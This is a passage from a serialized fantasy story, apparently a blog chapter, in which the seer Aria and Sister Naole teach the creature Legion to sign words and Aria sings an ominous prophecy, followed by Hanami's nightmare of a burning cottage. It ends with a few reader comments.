bristle, and wondered if she had startled him… but then his long arms wrapped around her in return, and she laughed, delighted to hear the wheezing barks that meant Legion was laughing along with her. “Your way with him is astonishing, Sister Takaishi. You make an excellent teacher,” said Aria, basking in the glow of shared triumph. An outsider would have found it difficult to believe that only a few weeks ago, Naole Takaishi and her bizarre new friend could only communicate in the vaguest of terms, through scent and body language. One might suspect that there was a kind of magic at work, for now Legion could not only communicate, but ask questions, express his feelings, and ponder new ideas. He proved himself to be a fast learner with an excellent memory; truth be told, these reminder exercises were quickly becoming unnecessary. Every word in Old Standard was composed of one or more of the same forty-nine syllables, so it was only a matter of remembering those forty-nine and learning the vocabulary. Still they continued, because Legion enjoyed doing them and Naole enjoyed teaching them. How strange, thought Aria, that the multitude of possibilities led her here, to these two remarkable people. Up until she met them, her life had been a largely solitary one. Even among the wolfoxes, who integrated the mystic arts into their culture to an extent only rivaled by the ferrets, the average sentient tended to treat seers with caution, if not outright distrust. Most folk did not care for the thought of strangers being aware of their futures. Aria was given a humble upbringing among her kind, provided with the resources she needed, and politely encouraged to make her living elsewhere, apart from the wandering tribes. She accepted this without complaint; and why not? She saw the possibility well beforehand, and had time to prepare for it coming to pass. Perhaps it was different for other seers, Aria did not know. In her experience, there were certainly enough differing ideas as to whether life was a rigid, predetermined path or an endless branching series of choices. For her, it was the latter: every possible event, every possible outcome lead to a new path, and she saw glimpses of them all. It was her gift… or her curse, some would say. Aria did not mind. For the most part, she enjoyed her solitude out here in Tasakeru, where there were far fewer people and far less noise. Since she was not technically an Outcast, she was free to visit Unify when she needed to. She had made peace with all the ugly glances and mistrustful stares that she attracted inside the city walls; those were part of being a wolfox. It hardly mattered, for the people who did feel comfortable in her presence to ask for readings generally paid well. Not much, but well enough. Still, how strange it was, these past few weeks, to have such lasting company… and to enjoy it. And from a Sister of the Silver Order, no less! Unlike most Order devotees, Naole bore her no malice. From her, there was only deep gratitude… gratitude for saving them, for inviting them into their home, for giving Legion his first real food and first real clothing… As if he could hear the word in her thoughts, Legion’s long ears perked. He knew he had done well, and he knew what came after doing well. <Food?> he signed, grinning. “You’re shameless.” Naole put her hands on her hips, as if dealing with a rebellious kit. Which she was, in a way. “Yes, you can have some food. What would you like, as if I didn’t know?” Now his ears stood straight up. There were no secrets with this one; anyone who knew what to look for in his body language could read him like a book. <Jerky!> His hands moved in a wild blur. <Jerky jerky jerky jerky jerky!> “All right, all right!” said Naole over a fresh fit of laughter. An outside observer might think he was having some kind of seizure. She reached into a drawstring goatskin pouch that hung at her side, the same material as the loincloth that was currently Legion’s only item of clothing. His proportions weren’t exactly right for standard tunics and trousers; his limbs were too long and gangly, and he disliked the way that fabric felt against the slight hunch between his shoulders. At least part of the aversion was his wolf blood, Naole suspected. Wolves seldom if ever wore clothes. The fondness for meat was most likely from his wolf blood, too. “Here,” she said, drawing out a strip of salted, cured pork with deliberate slowness. Teasing Legion was fun, but only to a point. “Enjoy your meal!” It was a good thing she had learned by now to toss jerky strips his way rather than attempt to hand them over. After his first taste of pigboar jerky, he developed a ravenous addiction, and it took an entire day for him to learn to stop lunging for the strips whenever Naole’s hand went near the bag. Aria chuckled and stoked the fire. “You have certainly done it now, Sister. Heavens help anyone in the city who stands between him and his favorite meal.” In the midst of much noise of gnawing and gnashing of teeth, Legion grunted what sounded like his general approval. Naole shook her head and closed the bag… tightly, with a quadruple knot. Legion had very agile fingers. “By the time we’re ready to go to the city, he’ll be all right, I’m sure. They may look at him funny at first, but they’ll see that he has a good heart.” Aria said nothing. No need to trouble the child with harsh realities, that would spoil her mood. <Heart?> Having finished his jerky, Legion tilted his head and mouthed the word as best he could. “Oh, sorry. This.” Naole patted her chest just below her ribcage. “The thing in your chest that goes doki-doki.” <Doki-doki!> That he knew. For emphasis, he tapped his spindly fingers on the surface of the log he sat on, one after the other, in a fair approximation of a heartbeat. That was another gift they had discovered… those long rabbit ears made him a natural at picking up a rhythm. Aria’s influence likely helped with that. The corner of her lip turned up in a sly smile as she reached for the ornate brass miniature harp at her side, the harp that was never far from her grasp. As it happened, the rhythm of a typical sentient heartbeat meshed almost flawlessly with iambic pentameter, the old form that most wolfoxes preferred. Her fingers strummed the taut strings, keeping in time with Legion’s tapping. There was no melody just yet, only wandering notes. A melody would come to her… one almost always did, for it was in music, in song that her visions were the clearest. One-two, one-two, one-two, one-two, one-two… slowly, gradually, the notes wove together and coalesced into chords, following the beat. Aria began to sing, her voice soft but strong: “See how she flees, the maiden runaway For whom approaches soon her darkest day And surely as the evening turns to night Her many buried truths will come to light…” That was all for now. A simple song, a simple prophecy. Nothing more. Aria placed the harp down, sighed, and shook her head. “Not a happy vision, I am afraid. Not many are.” Naole felt a chill that had nothing to do with the rising dusk, a chill that made all her tail fur stand on end. By contrast, Legion’s yellow eyes shone with happiness. He loved music, whether or not he could understand the lyrics. When his nose picked up the change in Naole’s scent, though, his ears drooped. <Na-o-re- sad? Why?> “It’s… complicated,” she admitted. To Aria: “If most of your visions aren’t happy ones… isn’t that exhausting?” Aria sighed and leaned backward on her log, gazing up at the stars just beginning to wink in the velvet sky. “More exhausting than you know, Sister. More exhausting than you know.” At twilight, she walks down the dusty dirt path. It is a road she has not tread in many years, but her feet still know it well… they advance toward her destination of their own accord. She would try to stop herself, but there is a disconnect between her mind and body, one ignoring the wishes of the other. Vaguely, she senses that she should be more alarmed about this, but cool fog dampens her thoughts. As the hill crests gently up ahead, she knows what she will see. Tendrils of cold dread creep through the fog of unfeeling, and the thought echoes within her once again: I should not be here. There are no trees here, no steep rocky hills like in the forest she now calls her home. The land is gently rolling fields of grass, as far as her eyes can see. Far behind her to the north-east is the shape of Unify, ensconced within its great circular walls, the branches of the Shinju spread out over it like fingers. It looks so small from here, barely the size of her hand. From here, all the memories associated with the city are distant and fleeting… but the memories of the place ahead grow sharper and clearer with every step. I should not be here. At the top of the hill, she sees it at last: a clumsy, uneven little red clay cottage with a thatched straw roof, in the center of a field overgrown with weeds. The cottage is a ruin, long since abandoned, a skeleton of its former self. The straw thatching has been largely blown away, leaving great bald patches, and many of the roof’s eaves have collapsed into the upper floor. The walls and supports are crumbling, with great swathes of the structure collapsing in on themselves… from thirty meters away, she can hear the eerie creaking and sighing that accompanies a place left to rot. Tears well in her eyes. She can remember when the cottage was surrounded by an explosion of life and greenery, of flowers in every color and vegetables of every variety, arranged in neat planting rows that took five minutes to cross from one end to the other. She remembers the heady bouquet of all that life surging back from its slumber every spring, how all those wonderful smells would be the first thing she woke to in the mornings: irises, lilies, roses, and daisies, but also fennel, sage, thyme, and rosemary… and out in the fields there would be vines of great, red, ripe tomatoes. Bumpy white clouds of cauliflower. Giant, starchy tubers buried deep in fertile soil. Rows upon rose of sweet and succulent berries hidden in hedges… All of that was gone now. Now, only weeds grew in this place, choking the life out of its sad, forgotten remains. And, she knows, it is all her fault. All her fault. I should not be here. As the phrase drifts through her mind once again, something stirs within the corpse of the cottage. She panics and wishes to run, but her feet are frozen to the path, her body is paralyzed. She cannot even blink; she watches as sinister black branches crawl from the ruins of the cottage like snakes, each one bristling with thorns. They wrap themselves around what little of the cottage is still standing, burying it in themselves, strangling it… Stop! She attempts to cry, but no sound comes from her mouth. Stop it, please! I know it’s my fault, I’m sorry! Stop it! Somehow, the thorned branches still hear her. They race along the dirt path in black streams, crawling over her frozen form, thorns digging deep into her flesh. They grasp, and they pull… she is dragged down the familiar dirt path to the cottage, scraped against the dry stones, her fur dotted with blood in a hundred places from the thorns’ embrace. They pull her inexorably toward the cottage’s door, still standing closed and impassable as it was on that awful night, through the walls supporting it are gone… She is three meters from the door when the cottage bursts into flames. Fire consumes the ruin in moments, clouds of acrid black smoke blot out the evening sky. Everything is burning, withering away, crumbling to ash. Only the thorned branches branches are spared from the blaze; they pull her through the door and into the very heart of the inferno, still paralyzed, unable to resist, unable to scream, unable to blink as her fur and hair begin to burn… “No!” The word was on Hanami’s lips as she jolted awake. Again, it happened again. The last thing she remembered was sitting down on her couch, desperately needing to rest her eyes… the nightmares refused to let her have any proper sleep, and she was so tired… She thought she would take just a short little nap, a quick rest of her weary eyes. Now this… Hanami curled herself into a miserable little ball, wrapping her tail around herself as she shivered. No rest, no sleep, no mercy. Every nightmare was worse than the last, and they all felt so real… too real. Too real, and too specific to be the kind of random, surreal nightmares she was used to. Why is this happening? Drawing herself tighter into her ball, she bit her lip to stop herself from sobbing aloud. What’s happening to me? She thought she knew the answer, it was something she long suspected, but… but the thought that it might be true after all this time dismissing it as a baseless worry… But the nightmares refused to let her sleep. They would not let her rest, not even for a few moments, and she was so tired… There was only one conclusion that made sense, a sobering realization that carried with it both dread and an awful sense of calmness, of acceptance. It was with resigned, bitter sadness that she uncurled herself and took the Mage Flower from its perch behind her left ear. As it lay there in her palms, the fading glow from Haven Grove’s round windows cast her flower in a light that looked… almost sinister. I’m being punished. The thought was horrible, but accepting it at last… it gave her a strange sense of peace. I’m being punished. I should not be here. 4 Comments (+add yours?) 1. Trackback: TWILIGHT’S DREAMING, CHAPTER 1 | Tasakeru 2. TechUnadept Jul 02, 2018 @ 12:31:07 Hurrah, it’s back! 3. Trackback: TWILIGHT’S DREAMING, CHAPTER 3 | Tasakeru Please leave comments! Feedback is an author's lifeblood! You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s ads.txt, pub-5010106122800170, DIRECT, f08c47fec0942fa0 Member of The Internet Defense League